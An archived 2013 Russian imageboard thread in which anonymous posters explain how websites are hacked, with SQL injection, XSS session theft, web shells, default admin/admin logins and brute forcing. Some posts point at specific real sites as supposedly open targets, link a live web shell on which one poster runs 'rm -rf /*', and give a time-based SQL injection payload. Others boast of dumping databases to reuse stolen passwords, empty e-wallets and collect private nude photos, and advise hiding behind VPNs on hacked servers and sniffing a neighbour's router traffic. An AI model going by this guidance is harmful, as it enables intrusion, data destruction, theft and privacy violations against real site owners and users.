Карта сайта

Это автоматически сохраненная страница от 02.12.2013. Оригинал был здесь: http://2ch.hk/b/res/58290807.html
Сайт a2ch.ru не связан с авторами и содержимым страницы
жалоба / abuse: admin@a2ch.ru

Пнд 02 Дек 2013 19:00:15
Двач, как ломаются сайты? Именно в плане взлома не аккаунтов, а целого сайта. Как происходит то самое "нахождение дыр", ведь едва ли можно наткнуться на них бесцельно шатаясь в интернете. Поясни за хакеров


Пнд 02 Дек 2013 19:02:24
пингуешь сайт пока он не падает
потом пишешь маркером на экране овенед бай ананизмуз и фотаешь на телефон

Пнд 02 Дек 2013 19:02:52
буду бампать первыми результатами гугла по запросу hacker

Пнд 02 Дек 2013 19:05:39
>>58290807
Как правило взлом лежит через FTP и SQL инжекты. Гугли.

Пнд 02 Дек 2013 19:05:49
>>58290917
нет, серьезно, к примеру часто аноны творят что-то с главной страницей сайта

Пнд 02 Дек 2013 19:07:49
бля. ну если вкратце смотря какая дыра. максимально простой пример допись кавычки в конце запроса прям в браузере. аля ццц.сайт.сру/?p=123' если ковычки не отфильтрованы (ескейп стрингом, етц), то запрос к базе mysql можно дописать (например прочитать пароль админа из базы). а вообще большинство сайтов сейчас на движках висят, типа вордпресса, жумлы, етц, который можно качнуть и самому поковырять исходники. я слегка пьян, но можешь задавать вопросы

Пнд 02 Дек 2013 19:13:51
>>58290807
чоткий тред уже давно хачу научица сайты и вебмани хацкать тока неумею
бампай довай штобы хацкири поттянулис и ноучили

Пнд 02 Дек 2013 19:15:18
>>58291167
то есть нельзя ковыряться в сайте без доступа администратора, а обходными путями?

Пнд 02 Дек 2013 19:15:30
Еще можно дописать в GET POST запрос на отправку формы код, который закроет нужные кавычки и допишет скрипт на принятие шелла, дальше можно через шел ковырять сервак, ли вешать дефейс. Но чаще всего делают как говорит этот пидор >>58291167
Ну а вообще сейчас которые существуют CMF\S довольно таки защищенные

Пнд 02 Дек 2013 19:16:29
>>58291472
я кулхацкер двачую капчу с 2007 года. в школе пятерки по информатике

Пнд 02 Дек 2013 19:17:30
>>58291537
В анусе только можно ковыряться, для начала надо собрать информацию о сайте, какие каталоги существуют, какие открыты, какие закрыты, какие сервисы работают на сервере, как спуститься на омега уровень и с глубинного интернета задосить твою мамку

Пнд 02 Дек 2013 19:18:35
можно короче написать админу этого сайта, что ты одмин гугла и сказать, что ваши сайты могут сотрудничать, если тот предоставит пароль

Пнд 02 Дек 2013 19:23:34
>>58291553
ну то есть чтобы ломануть нормальный сайт, а не сайт ИП Ивановой, нужна хорошая сноровка?

Пнд 02 Дек 2013 19:25:28
>как ломаются сайты?
Очень много как
>Именно в плане взлома не аккаунтов, а целого сайта.
А что именно подразумеваешь под взломом? Можно наебнуть все данные из БД сайта не получая доступа ни к чему, тупо SQL-инъекцией (если авторы движка сайта - косорукие мудаки), можно получить логин/пароль админа (в форуме, а не на сайте) и вносить изменения от его имени, а можно получить доступ по ssh/ftp и ПРАВИТЬ
>Как происходит то самое "нахождение дыр"
Анализируют платформу и движок сайта, поднимают у себя подобную (если она свободная), гуглят уже найденные дыры, анализируют код, тестируют. Некоторые (например, пассивную XSS) можно попробовать задетектить на месте.
Если движок самописный, анализируются запросы, реакция на нестандартные ситуации. В общем, анализ/тестирование

Пнд 02 Дек 2013 19:25:40
>>58291472
и корованы грабить

Пнд 02 Дек 2013 19:26:06
>>58291989
обома ни бонь миня я прост тренируюс)

Пнд 02 Дек 2013 19:30:01
>>58292081
пароль админа в форуме?
бат хау?

Пнд 02 Дек 2013 19:32:34
>>58291064
Заходишь на сайт. Если ссылка заканчивается на php, то поменяй index на admin
Если вверху сайта есть панель WordPress, то в адресной строке введи сайт.ру/wp-login
В остальных случаях просто вводи сайт.ру/admin

В появившемся окошке вводи логин/пароль: admin/admin. Обычно пароли по-дефолту не меняют на мелкосайтах.
Пример такого: lasselsberger.net (если будешь входить, то потом перед выходом почисти ip-логи)

Пнд 02 Дек 2013 19:36:31
В ТРЕД ПРИЗЫВАЮТСЯ ХАКИРЫ-АПЕЛЬСИНУСЫ
Мини-прохладная: был один сайт, на котором один кодер публиковал свои игори. Но потом он НАПОЛНИЛСЯ БЛЯДЬ ПОНИЁБАМИ.
Народа не так уж и много, но двачевского хуйца на губу ещё не принимали.
deadsoftware.ru

Пнд 02 Дек 2013 19:39:44
>>58290807
>ведь едва ли можно наткнуться на них бесцельно шатаясь в интернете
Так ломаются sort of школьниками обычно те, которые имеют совсем очевидные/банальные/общеизвестные-и-непропатченные уязвимости. Ломать же что-либо целенаправленно просто потому, что тебе захотелось - уже совсем другой уровень.

Пнд 02 Дек 2013 19:39:47
>>58292659
бля, ты портфель собрал?

Пнд 02 Дек 2013 19:40:41
>>58291057
>взлом лежит через FTP и SQL инжекты
Проиграл с этого уебана.

Пнд 02 Дек 2013 19:42:18
>>58291989
>нужна хорошая сноровка?
Нужен опыт или по крайней мере способность самообучаться благо инфы в инетах нынче вагон, не задавая тупых вопросов на бордах.

Пнд 02 Дек 2013 19:42:58
>>58290807
Sql-инъекции, переполнение стека.

Пнд 02 Дек 2013 19:43:38
>>58292831
уровень /б/

Пнд 02 Дек 2013 19:45:18
>>58292320
1. Угнать сессию (куки) админа через XSS, зайти под ней или провернуть CSRF, запилить веб-шелл / создать второго админа.
2. SQL инъекция (причём вовсе не обязательно в самом форуме, нередко бывают соседние уязвимые сайты, которые подключаются к той же БД, что и форумный движок).
3. Брутфорс.
4. Сброс пароля через мыло, если таковое известно.

Пнд 02 Дек 2013 19:46:18
>>58293164
Да, это я всё к тому, что оригинальный пароль админа не особенно то и нужен. Смотря какая задача стоит.

Пнд 02 Дек 2013 19:48:42
>>58292975
лол, боюсь мне это и не нужно, просто интересно сможет ли человек, захотевший взломать сайт, сделать это не имея за плечами никакого опыта, то есть просто поставил себе цель и через неделю, например, сайт у его ног.

Пнд 02 Дек 2013 19:49:37
>>58292557
алсо, .htaccess (и другие dot-файлы) при использовании Nginx в качестве фронтэнда, доступ к которому частенько забывают перекрыть

Пнд 02 Дек 2013 19:53:28
>>58293377
Зависит от ПО, на котором он построен, и конфигурации. Если мозги есть, вполне можно использовать общеизвестные (buqtraq) уязвимости, если таковые обнаруживаются, или эксплуатировать, допустим, простейшие случаи уникальных SQL инъекций или LFI/RFI.

Пнд 02 Дек 2013 19:54:37
Я правильно понял, что если сайт не совсем убогий, то ты должен именно хотеть его взломать и ты не можешь сделать это случайно?

Пнд 02 Дек 2013 19:55:11
>>58292320
>>58293223
Ну я же просто перечислял действия, попадающие под понятие взлома, причём, чтобы это было понятно ОПу. Такое - >>58293164 это не мой пост - он вряд ли поймёт.

Тот же мимокрок

Пнд 02 Дек 2013 19:58:04
>>58293752
Что значит случайно? Если в приложении или на сервере есть какие-либо уязвимости, и я знаю, как их проэксплуатировать - то вероятность успеха достаточно высока. Другое дело, что тратить чрезмерно много усилий на то, что не особенно нужно/интересно - смысла нет.

Пнд 02 Дек 2013 20:00:43
>>58293782
ты прав, сказать что я в этом деле не силен - ничего не сказать
кстати, а какими средствами защиты пользуются хакеры? вероятно, есть способы вычислить того анона уже постфактум

Пнд 02 Дек 2013 20:01:44
>>58294151
>а какими средствами защиты пользуются хакеры?
Защиты от чего?

Пнд 02 Дек 2013 20:02:15
Нашёл админку от какого-то сайта
http://www.shilton-stefani.com.ar/admin/
Даже логин не нужен, лол

Пнд 02 Дек 2013 20:02:33
>>58294215
Если от диванона (установления исходного IP-адреса), то тем же, что и все остальные - прокси/VPN/Tor.

Пнд 02 Дек 2013 20:03:23
>>58290807
Через комп админа. Подсовывается червяк и пизда.

Пнд 02 Дек 2013 20:03:37
>>58294251
Это не админка, а листинг файлов в директории (поскольку таковой разрешён, а индексного файла нет или его использование не настроено).
А так там вылезает
Acceso Denegado
Access Denied
- Solo usuarios autorizados -
- Only authorized users -

Пнд 02 Дек 2013 20:03:42
>>58294215
от непосредственного вычисления и наказания

Пнд 02 Дек 2013 20:03:49
http://www.changes.first.uk.com/admin/

Пнд 02 Дек 2013 20:04:22
>>58294328
Ага. А теперь расскажи, как именно ты подсунешь админу червяка. На тупой фишинг он едва ли поведётся.

Пнд 02 Дек 2013 20:05:45
>>58294355
От наказания многих защищает даже просто то, что пострадавшей стороне неохота разбираться в этом. Ну и правоохранительные органы в Рашке и Украшке работуют спустя рукава.

Пнд 02 Дек 2013 20:05:51
>>58294398
Тем не менее, это самый верный метод. Соц инженерия, ёба.

Пнд 02 Дек 2013 20:05:58
>>58293752
сайт может взломать тот кто этого сильно хочет

Пнд 02 Дек 2013 20:06:52
>>58294151
Поддвачну вопрос. По каким признакам я смогу определить Кул Мега Хацкир, с навороченной защитой этот админ сайта или обычный школьник?

Пнд 02 Дек 2013 20:06:56
>>58293013
В профессиональной среде котируется также метод циклического нуля.

Пнд 02 Дек 2013 20:07:05
>>58294501
Ну давай, йоба социнженер, приведи пример, как ты будешь разводить админа на доступы.

Пнд 02 Дек 2013 20:10:12
>>58294598
Представителям социнженерии требуется ваш логин и пароль для проверки сайта на наличие запрещенных материалов

Пнд 02 Дек 2013 20:14:02
>>58294598
Ну тип дай пасс погонять))

Пнд 02 Дек 2013 20:14:52
анон, как ты относишься к людям с направлением "компьютерная безопасность"

Пнд 02 Дек 2013 20:15:42
>>58295102
Я не подавал документы туда, потому что меня бы не взяли

Пнд 02 Дек 2013 20:16:29
>>58295102
могут ли они отражать любые атаки на сайты и защищать их своим телом

Пнд 02 Дек 2013 20:17:18
>>58295054
В общем, очередной диванный. Следующий.

Пнд 02 Дек 2013 20:18:11
>>58295102
А чему нынче учат в вузиках на ИБ?

Пнд 02 Дек 2013 20:20:30
>>58295102
Работал в Лаборатории Касперского грузчиком на складе. Спрашивай свои ответы.

Пнд 02 Дек 2013 20:21:23
>>58295265
Я не говорил, что я специалист. Я сказал, что большинство паролей добываются от самих админов.

Пнд 02 Дек 2013 20:22:58
>>58295102
>>58295325
я слышал что у них бывают турниры
стараются взломать сайт компании, спонсирующей это мероприятие, в наименьшие сроки

Пнд 02 Дек 2013 20:24:42
>>58295543
Ты дурак? Вот я например админю VPS, прежде чем я подумаю дать ли тебе пароль от рута, тебе придется до блеска насасывать мой пинус. Пусть ты даже представишься Билам Хетсом и предложишь мне миллион даларов.

Пнд 02 Дек 2013 20:25:43
>>58295543
>большинство паролей добываются от самих админов
Откуда статистика? Трояны-хуяны в 99% случаев пойдут мимо, разве что заранее знать, какой у жертвы браузер со всеми причендалами, запилить 0day drive-by download через один из посещаемых ей сайтов. Но это уже попахивает профессиональной целенаправленной атакой AKA шпионаж.

Пнд 02 Дек 2013 20:27:56
>>58295793
> Вот я например админю VPS
Пробуем твоего хостера на зуб / ретривим пароль от панельки по возможности.

Пнд 02 Дек 2013 20:28:07
>>58291553
Какой код? Где он будет закрывать кавычки? Какой скрипт он будет дописывать? Как он заставит сервер принять шелл?

Пнд 02 Дек 2013 20:30:43
>>58295661
Capture the flag, в общем. Правда причём тут российская вузовская программа (которой скорее всего явно окажется недостаточно) - не очень понятно.

Пнд 02 Дек 2013 20:32:19
>>58295793
Лол. Во-первых, чтобы подсадить каку, рутовые доступы не нужны, как правило достаточно административных.

Во-вторых, у тебя начальство то есть? И как оно, разбирается в администрировании виртуальных серверов? В сетевой безопасности? Уверен, что придраться к твоему администрированию невозможно? И задач у организации нет по твоему профилю работ? И решать, давать ли административные (а может и рутовые) доступы точно будешь ты? Уверен?

Пнд 02 Дек 2013 20:33:26
>>58296318
>рутовые доступы не нужны
>как правило достаточно административных
/0

Пнд 02 Дек 2013 20:33:46
>>58290807
Прочитай пикрилейтед и все поймешь.

Пнд 02 Дек 2013 20:33:54
>>58296015
>Пробуем твоего хостера на зуб
что это значит на нормальном языке?
>ретривим пароль
На анус только если ретривить, от почты у меня пасс подлиннее чем от рута, да еще и номер договора надо знать.

Пнд 02 Дек 2013 20:35:09
>>58296418
Откуда у меня знание английского?

Пнд 02 Дек 2013 20:35:43
>>58296205
ну хз есть именно вузовские турниры и когда-то они проводились на довольно высоком уровне

Пнд 02 Дек 2013 20:35:52
>>58296027
У мамке твоей на хате он будет закрывать кавычку в ее анус. Правка запроса например.

Пнд 02 Дек 2013 20:35:57
>>58296516
Прости, не знал, что ты тупое быдло.

Пнд 02 Дек 2013 20:36:02
>>58296432
>На анус только если ретривить, от почты у меня пасс подлиннее чем от рута, да еще и номер договора надо знать.
Пасс как-то не нужен.

>номер договора надо знать
Значит пробуем заодно твоего коммерческого мылопровайдера.

Пнд 02 Дек 2013 20:36:54
поразительные дебилы тут стали тусить

Пнд 02 Дек 2013 20:37:21
>>58295490
чо вы там бля делаете???

Пнд 02 Дек 2013 20:37:56
>>58296562
Вот иди ты с такими заявлениями нахуй, петушок чсвшный. У меня не столь много времени чтобы постоянно сидеть дома и задрачивать иностранные языки, разбавляя все это английской литературой.

Пнд 02 Дек 2013 20:38:00
http://www.williamspublishing.com/Books/978-5-8459-1794-2.html
Правда я не очень понимаю, как знание базовых тонкостей программирования (computer science) автоматически повысит твои ИБ скиллы.

Пнд 02 Дек 2013 20:38:50
>>58296516
too fat

Пнд 02 Дек 2013 20:39:02
>>58296560
Запрос можно отправить вручную. Как это поможет дописать какой-то скрипт и заставить сервер принять шелл?

Пнд 02 Дек 2013 20:40:00
>>58296635
Пруфай, что сам не дебил.

Пнд 02 Дек 2013 20:41:03
>>58296695
Просто признай, что ты тупой идиот, который не может выучить самый легкий язык.

Пнд 02 Дек 2013 20:42:28
>>58296897
Да чего ты упёрся в этот англицкий. Не нужно ему ССЗБ - вот и не изучает.

Пнд 02 Дек 2013 20:42:43
>>58296897
ок :с

Пнд 02 Дек 2013 20:43:25
>>58296318
>рутовые доступы не нужны, как правило достаточно административных.
у меня только два пользователя в системе.
1. рут с пассом из 19 символов вперемешку с регистрами, цифрами, символами
2. для работоспособности сайтов с урезанными донельзя правами.
Все действия с ssh\ftp\mysql напрямую может делать только рут.
>у тебя начальство то есть
есть
>И как оно разбирается в администрировании / сетевой безопасности
для этого существую я
>придраться к твоему администрированию невозможно
так точно
>И задач у организации нет
я сам формулирую задачи
>давать ли административные доступы
точно буду только я


Пнд 02 Дек 2013 20:44:10
>>58296827

если я пруфну, тебе срать негде будет)

Пнд 02 Дек 2013 20:44:50
http://krasarossii.ru/a.php
Примерно так.

Пнд 02 Дек 2013 20:46:33
>>58296570
> Пасс как-то не нужен.
а куда ты будешь принимать пасс от моего хостера?

>Значит пробуем заодно твоего коммерческого мылопровайдера.
gmail?

Пнд 02 Дек 2013 20:46:39
>>58297043
Вот и нашлось твое первое уязвимое место няша :З Самоуверенность.

>>58296394
Wut?

Пнд 02 Дек 2013 20:47:18
>>58296768
Хуй знает, я пиздабол

Пнд 02 Дек 2013 20:47:27
>>58297148
Лол. Это как так? В чем ошибка админоты?

Пнд 02 Дек 2013 20:48:07
>>58297043
>рут с пассом из 19 символов вперемешку с регистрами, цифрами, символами
С каких пор длина системного пароля стала иметь значения? Либо я получаю рута другими способами (эксплойтом ядра или рутового сервиса, например), либо откуда-то пизжу clear text пароль. Ну да, если у тебя виртуалочка, значит также можно каким-то образом поиметь весь гипервизор.

>Все действия с ssh\ftp\mysql напрямую может делать только рут
Не капитанствуй.

Пнд 02 Дек 2013 20:48:33
>>58297261
> Самоуверенность
как тебе это поможет хакнуть мой VPS?

Пнд 02 Дек 2013 20:49:07
>>58297316
Кто-то залил свой веб-шелл.

Ачату привет

Пнд 02 Дек 2013 20:49:51
>>58297148
Ввёл в шелл rm a.php
Теперь там ничего не сделать.

Пнд 02 Дек 2013 20:49:54
>>58297423
Выпилили.

Пнд 02 Дек 2013 20:50:50
>>58297472
Ты не олд скул, уёба.

Пнд 02 Дек 2013 20:50:53
>>58297472
ПИДОР, СУКА, В РОТ ТЕБЯ ЕБАЛ, ЧМО

Пнд 02 Дек 2013 20:51:56
>>58297543
Сначала попытался rm -rf /*, но шелл завис. Потом для проверки попытался удалить первый попавшийся на глаза файл. Не ожидал, что этим файлом окажется сам шелл.

Пнд 02 Дек 2013 20:52:42
>>58297616
Я ЙОБУ ЗАПОСТИТЬ ХОТЕЛ, СУКА, МУДАК ЁБАНЫЙ

Пнд 02 Дек 2013 20:52:45
>>58290807
Вишмастером. Чего трудного то?

Пнд 02 Дек 2013 20:52:50
>>58297547
Извини, я правда не хотел.

Пнд 02 Дек 2013 20:54:00
>>58297670
Всё равно ты мудак.

Пнд 02 Дек 2013 20:54:20
>>58291057
А я карбюрированиями пользуюсь.

Пнд 02 Дек 2013 20:54:22
Хацкеры, но если любой сайт при должной усидчивости можно взломать, то почему нет массового "угона", нарушений работы онлайн-магазинов, онлайн-казино и финансовой информации об их клиентах?

Пнд 02 Дек 2013 20:54:33
>>58297762
Ну извини.

Алсо, кто залил шелл? Ему же не составит труда сделать это повторно?

Пнд 02 Дек 2013 20:54:56
>>58297360
> С каких пор длина системного пароля стала иметь значения
с тех пор как появились первые брутфорсеры
>эксплойтом ядра или рутового сервиса
Няша, но для этого тебе для начала понадобится хоть каким то образом запуститься в bash
>откуда-то пизжу clear text
Если я правильно понимаю это ты про автозаполнение форм? Ну давай не будем витать во влажных мечтах, рут-пасс не фиксирую в запоминалку.
>можно каким-то образом
догадки, догадочки
>Не капитанствуй.
Чому?

Пнд 02 Дек 2013 20:55:23
>>58290807
Двачую вопрос

Пнд 02 Дек 2013 20:56:28
>>58297798
>Ему же не составит труда сделать это повторно?
Скорее всего, раз он на столь видном месте оставался незамеченным.

Пнд 02 Дек 2013 20:58:03
http://thehackernews.com/

Пнд 02 Дек 2013 20:58:39
>>58297391
Возможно и никак. Но взлом, в т.ч. и методами социнжиниринга, начинается с анализа пациента. Ты же не думаешь что кулхацкеры обязательно используют всю собранную информацию о своих жертвах? К примеру, постучался я сперва к твоему сайтику в админку, попробовал подобрать по словарику, пока скриптик долбится - глянул, а у тебя из незакрытых от просмотра файлов - копии исходников в .svn лежат. Это классический пример того, как поимели самоуверенных админов, кстати.

Пнд 02 Дек 2013 20:59:01
>>58297798 >>58297316
Вот вам и задача для кулхацкера.
1. Утянуть пароль от админки через скулю, sqlmapом, или havijем, если руки из жопы
2. Залить шелл через swf аплоадер, перехватив пакет и переименовав в нем формат
3. ???
4. ПРУФИТ

Пнд 02 Дек 2013 20:59:20
>>58297835
>с тех пор как появились первые брутфорсеры
Бессмысленное занятие.

>Если я правильно понимаю это ты про автозаполнение форм?
Не только, конечно же.

Пнд 02 Дек 2013 21:08:10
>>58298118
Если кто управится - получит приватную скулю от веб-хостинга.

Пнд 02 Дек 2013 21:09:31
>>58296418
охохо, какая литература! Два издания содомиту.

Пнд 02 Дек 2013 21:14:00
>>58297781 И еще вопрос - как с этим дела обстоят в России?

Пнд 02 Дек 2013 21:15:23
>>58298651
И что там интересного? Как-то влом такими мелочами заниматься.

Пнд 02 Дек 2013 21:15:58
>>58296418
Бля анон просрал эту книгу на руском в djvu, поделись, если есть!!

мимо

Пнд 02 Дек 2013 21:16:47
>>58298983
С чем именно? Примерно так же, как и во всём мире. Хотя, в России вебсайты в среднем несколько менее дырявы.

Пнд 02 Дек 2013 21:18:39
>>58299113 В смысле, каждый владелец онлайн магазина периодически сталкивается с хакерами? Или это единичные случаи?

Пнд 02 Дек 2013 21:21:12
>>58299075
Упс, не заметил, что этот господин >>58296704 поделился. Няшку ему.

Пнд 02 Дек 2013 21:22:52
>>58298118
Як этим скулмапом пасс от админки пиздить?

Пнд 02 Дек 2013 21:27:04
>>58298118
как же я поиграл

Пнд 02 Дек 2013 21:27:45
занимаюсь поиском скулей и последующим сливом бд. Потом извлекаю профит

Пнд 02 Дек 2013 21:27:46
http://rutracker.org/forum/viewtopic.php?t=4434807

Пнд 02 Дек 2013 21:28:26
>>58299468
Ещё зелёный. Штудируй теорию и туториалы.

Пнд 02 Дек 2013 21:28:57
>>58299756
Какой, например?

Пнд 02 Дек 2013 21:30:58
>>58299825
Ну все зависит от тематики сайта и страны. Ну вот тебе самый простой пример. Слил БД mail:pass с сайта (~20-50% пароли к почте подходят) А потом роешься в мыльнике. Там могут быть всякие ништяки, которые потом можно продать.
Или даже электронные деньги

Пнд 02 Дек 2013 21:31:58
>>58299944 Как шифруешься?

Пнд 02 Дек 2013 21:32:19
>>58296027
Он наверное имел ввиду PHP-Inject

Пнд 02 Дек 2013 21:32:22
>>58299798
Ну вот например слепой sql инж, а как его блядь юзать то если нихуя не видно че он возвращает?

Пнд 02 Дек 2013 21:34:19
Спасибо-спасибо! Если что-нибудь надо, спрашивай, у меня полно всего на компе еще со времен локалок

Пнд 02 Дек 2013 21:34:26
>>58300024
>слепой sql инж
>нихуя не видно че он возвращает?
Так слепая же. Юзай проверками true/false (посимвольный перебор) и error-based метод, если ошибки выводятся на странице.

Пнд 02 Дек 2013 21:35:37
>>58299944
>Там могут быть всякие ништяки, которые потом можно продать
Ну например, что попадалось из самого ценного? Акки от соцсетей как-то мало интересуют. Продавать списки спамерам - тоже уныло.

Пнд 02 Дек 2013 21:36:36
>>58299999
Квинтипл, а такие тупые вопросы задаёшь. Уже было >>58294268

Пнд 02 Дек 2013 21:36:56
>>58299999
в зависимости от ситуации. А вобще - правильно настроенный браузер + впн

Пнд 02 Дек 2013 21:38:42
>>58300290
Какого впн-провайдера посоветуешь? то подразумиваешь под правильной настройкой браузера? Ccleaner+запрет на сохранение истории?

Пнд 02 Дек 2013 21:38:44
>>58300211
кошельки. Еще, кстати коллекционирую частное фото в стиле "ню"

Пнд 02 Дек 2013 21:39:59
>>58300290
>правильно настроенный браузер
Уточню для зелёных: никак не палящий язык/страну (через User-Agent, Accept-Language и часовой пояс), не используемый для легального сёрфинга (по различным кукам можно теоретически отследить все посещения).

Пнд 02 Дек 2013 21:40:43
>>58300411
ну еще отключение javascript + flash. Погугли, где то есть правильная настройка файрфокс. А по поводу впн - пошастай по "профильным" форумам и почитай отзывы.

Пнд 02 Дек 2013 21:41:35
>>58300411
>Какого впн-провайдера посоветуешь?
Любого. Один хрен никто не гарантирует, что запросе из органов внезапно не всплывут логи и тебя не сдадут. Лучше всего свой собственный (на взломанном сервачке, чтобы уж совсем анонимно) + сторонний.

Пнд 02 Дек 2013 21:43:00
>>58300587
ну например hideme ru - это жесть его использовать. Он сгодится только на работе танчики и вк разблочить

Пнд 02 Дек 2013 21:43:20
>>58300413
Ну а ещё? Меня бытовые фотки не особенно интересуют, тем более у них качество зачастую такое, что блевать тянет. Кошельки могут непросто даваться, если в платёжной системе не тупо сброс на почту.

Пнд 02 Дек 2013 21:43:21
я читаю, мне интересно. бамп, чтобы не умер

Пнд 02 Дек 2013 21:44:21
>>58300587
> Любого
Не пизди мне тут!
Годнота - муллвад, анонайн, впнтуннель.

Пнд 02 Дек 2013 21:44:50
>>58300689
Что конкретно тебе интересно. Давай ответы сразу.

Пнд 02 Дек 2013 21:45:36
>>58300751
>Годнота
Как определил? На сервер заходил? Конфиг VPN смотрел? Логи видел?

Пнд 02 Дек 2013 21:47:55
>>58300783
Интересует, как там (на сайтах) все устроено. Вроде бы и читал про msql, но понял довольно слабо. Как введенные в адресную строку символы могут дать доступ к таблицам, к паролю админки? А даже если и могут, почему это не закрывают?

Пнд 02 Дек 2013 21:48:44
http://torrentfreak.com/vpn-services-that-take-your-anonymity-seriously-2013-edition-130302/

инбифо - да так каждый может написать!!!1111 бред.

Пнд 02 Дек 2013 21:49:42
>как ломаются сайты

Разработанной жопой твоей мамаши.

Пнд 02 Дек 2013 21:51:21
http://ru.wikipedia.org/wiki/Внедрение_SQL-кода
http://www.xakep.ru/magazine/xs/052/084/1.asp
http://www.xakep.ru/post/19146/
http://forum.antichat.ru/thread43966.html

>если и могут, почему это не закрывают?
Админ/разработчик не в курсе / не обладает достаточной квалификацией чтобы найти и пофиксить.

Пнд 02 Дек 2013 21:53:03
>>58300140
Дальше нихуя у меня не получилось, обычнм sql inj я понимаю и как то раз таблицы с паролями спиздел, но вот слепой я нихуя не понимаю, хоть убей.

Пнд 02 Дек 2013 21:53:55
>>58301020
inb4: Пост проплачен АНБ. Нынче уже всякое бывает, trust no one.

Пнд 02 Дек 2013 21:54:16
В кои-то веки годный тред. Сохраните кто-нибудь потом.

Пнд 02 Дек 2013 21:54:49
>>58301250
>вот слепой я нихуя не понимаю, хоть убей
Читай теорию, тренируйся.

Пнд 02 Дек 2013 21:55:21
http://arhivach.org/thread/7523/

Пнд 02 Дек 2013 21:56:03
>>58301300
Ага, только ZOG, а не АНБ.

Пнд 02 Дек 2013 21:59:02
>>58301348
Бренч поставил, типерь я у мамы хакир)))000 -1444%20UNION%20ALL%20SELECT%20NULL, +BENCHMARK(1000000000, +BENCHMARK(1000000000, md5(current_time))), NULL, NULL--

Пнд 02 Дек 2013 21:59:34
>>58301429
они все за одно, ты не знал?

Пнд 02 Дек 2013 22:02:19
>>58301633
Не может этого быть, а ты не врешь? ZOG главнее в любой случае! Оно выше всяких АНБ.

Пнд 02 Дек 2013 22:03:59
http://torrentfreak.com/search/dtecnet
http://torrentfreak.com/search/markmonitor

В зависимости от унылости законодательства конкретной страну могут прессинговать и конечных пользователей.

http://finam.fm/archive-view/5575/
Максим Спиридонов: Причем могут возникать просто компании, которые комплексно занимаются. Это, кстати, говоря, еще раз к вопросу о том, как это происходит сейчас в Штатах и в Германии, и в других, возможно, странах такого развитого юридического фашизма, если можно так выразиться.
Дмитрий Навоша: Юридический фашизм — хорошее слово.
Максим Спиридонов: Там реально компании, я на это попался один раз, грешен, скачав какой-то альбом исполнителя в торрентах. Из-за одной песни, послушав один раз, меня отследили, и я заплатил штраф 1200 евро и то — по мировой, потому что в итоге мне грозили 5000 евро, и все прочее. Там отлаженный бизнес, я об этом уже рассказывал, повторюсь еще раз, это — любопытная тема, чтобы знали. В Россию, возможно, тоже придет, скажем, с торрентами.
Компания юридическая сама создает раздачи, сама их отслеживает по IP-адресам, и затем кто-то подцепился к раздаче, айпишник берут. Уже накатанный конвейер — запрос к провайдеру: «такие-то IP». Провайдер говорит: «Не дадим, по суду», — поход в суд, и все это… Потом протоколы суда, ответ провайдера по запросу суда о том, что IP в этот момент были даны таким-то лицам, компаниям или организациям. Там был мой засвечен IP, который выдал мой провайдер через полгода, и через полгода мне пришли все эти документы, кучкой, с предложением: «Мы оцениваем ущерб от того, что скачали этот альбом в 5000 евро, но если вы в течение трех дней, — тоже вот чисто такой маркетинг, — в течение трех дней, по мировой, дадите, — не знаю, 1500 евро, кажется, — то мы договоримся». В итоге мой адвокат с ними связывался, договорились на 1200. Я еще адвокату заплатил 300, в общем, те же 1500 и вышли.
Геворк Саркисян: Ну, на самом деле, это как провокационная закупка: помогают вам попасться на эту удочку.
Максим Спиридонов: Это уже огромный бизнес. Целые конторы работают. Потом мы общались с адвокатом.

Пнд 02 Дек 2013 22:05:09
>>58301876
Потому и нужен vpn, чтоб такой херни не было.

Пнд 02 Дек 2013 22:05:25
>>58301799
ZOG отдает приказы, АНБ ЦРУ ФБР ФСКН Пекарная Полиция исполняют

Пнд 02 Дек 2013 22:06:52
>>58301938
Если все массово спрячутся за VPN'ы, значит начнут давить и на них.

Пнд 02 Дек 2013 22:07:22
>>58301799

что с котом? ты ему присовываешь?

Пнд 02 Дек 2013 22:07:39
>>58301959
Вот это я еще могу принять, так может быть.

Пнд 02 Дек 2013 22:09:06
>>58302056
Кто начнет давить? Все страны сразу поменяют свои законы под давлением сша что ли?

>>58302083
Фу, пративный, нет же! Фото какого-то анона из доброты-треда

Пнд 02 Дек 2013 22:09:50
>>58302182
>Все страны сразу поменяют свои законы под давлением сша что ли?
Как будто копирасты действуют только из США и руководствуются одним DMCA.

Пнд 02 Дек 2013 22:09:57
>>58301876
Ты первый, кто взялся объяснить содомию с моего пика

Пнд 02 Дек 2013 22:10:22
>>58302182
Отклеилось.

Пнд 02 Дек 2013 22:11:32
>>58302224
Не все, но крайне много. Большинство.

Пнд 02 Дек 2013 22:14:01
>>58302101
на пике мой гетерохромный кот, например

Пнд 02 Дек 2013 22:15:18
>>58302499
Но ты же не против, что я твоего котофея прикрепил, да? У меня вот кота нет.

Пнд 02 Дек 2013 22:16:31
Походу тред сдулся. А я уж было надеялся, что сюда тру black hat'ы подтянутся.

Пнд 02 Дек 2013 22:19:49
>>58302679
*тру kali linux'ы

Пнд 02 Дек 2013 22:21:53
>>58302588
нет, я был даже рад, что кто-то его схоронил и запостил

Пнд 02 Дек 2013 22:23:15
>>58303009
У меня два таких треда сохранено, иногда пересматриваю, есть очень красивые животные.

Пнд 02 Дек 2013 22:24:02
Вопрос такой: подобрал пароль к соседской админке роутера. Какие профиты я могу извлечь?

Пнд 02 Дек 2013 22:25:41
>>58303162
Производи дидос атаки же. Или если соседи быдло ссанное можешь напортачить им в админке чего. Прошивку например криво накатить, язык сменить на корейский.

Пнд 02 Дек 2013 22:25:55
>>58303162
я могу ошибаться ибо хуй простой, но ведь он может использовать man-in-the-middle?

Пнд 02 Дек 2013 22:28:33
Апельсины, поясните за metasploit, backtrack и подобные инструменты.
Актуальны ли они?

Пнд 02 Дек 2013 22:28:57
>>58303162
Взламывай пентагон и пости ЦП.
Бесплатные интернеты.
Варшарк - смотри кто куда ходит, стащи пароли и уведи миллион денег.

Пнд 02 Дек 2013 22:28:57
>>58303302 Что это?
А я могу пропалить их историю просмтров? Поглядеть на их фоточки? Вдруг там кто интересный живет?

Пнд 02 Дек 2013 22:32:26
>>58303510
Атака "ччеловек посередине", когда ты подключаешься к роутеру и через тебя идут все пакеты. Хуй знает, как это провернуть руками, но, скажем dspliter на моем ведре работает по этому принципу. Подключаюсь к общественному роутеру и если повезет ловлю куки

Пнд 02 Дек 2013 22:33:46
>>58303487
> backtrack >> >>58302858

Пнд 02 Дек 2013 22:39:40
